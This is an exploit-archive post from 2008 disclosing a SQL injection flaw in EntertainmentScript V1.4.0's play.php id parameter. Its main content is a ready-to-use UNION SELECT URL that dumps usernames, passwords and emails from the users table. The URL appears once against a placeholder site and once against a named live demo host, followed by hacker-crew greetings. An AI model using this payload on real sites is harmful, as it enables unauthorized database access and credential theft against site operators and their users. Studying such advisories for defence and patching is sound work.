EntertainmentScript (play.php id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EntertainmentScript (play.php id) Remote SQL Injection Vulnerability
# Published : 2008-05-19
# Author : Mr.SQL
# Previous Title : MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit
# Next Title : CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities

#########################################
# rEm0te SQL Injection Vulnerability    
#                                       
# EntertainmentScript V1.4.0  (( play.php id ))
#                                       
#########################################

## Script : EntertainmentScript.com   V1.4.0   name script on demo site is ( fastfreemedia )

## DeMo :  http://demo.fastfreemedia.com/index.php
       
	       
#########################################

## AuTh0r : Mr.SQL

## H0ME  : WwW.PaL-HaCkEr.CoM

## Email  :  SQL@Hotmail.it

#########################################

## D0rK ::         :)) not found

###################################################################################

##  (()) -(:: SQL ::)- (())

www.Site.com/
              play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*

--------

##  :: liVe DeMO ::

http://demo.fastfreemedia.com/play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*


###########################################################################

  Gr33Tz   :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH ::     (( MuslimS HaCkErS ))   
                  
##########################################################################
                                                  -((:::: Geek Inj3cT0r ::::))-

# www.Syue.com [2008-05-19]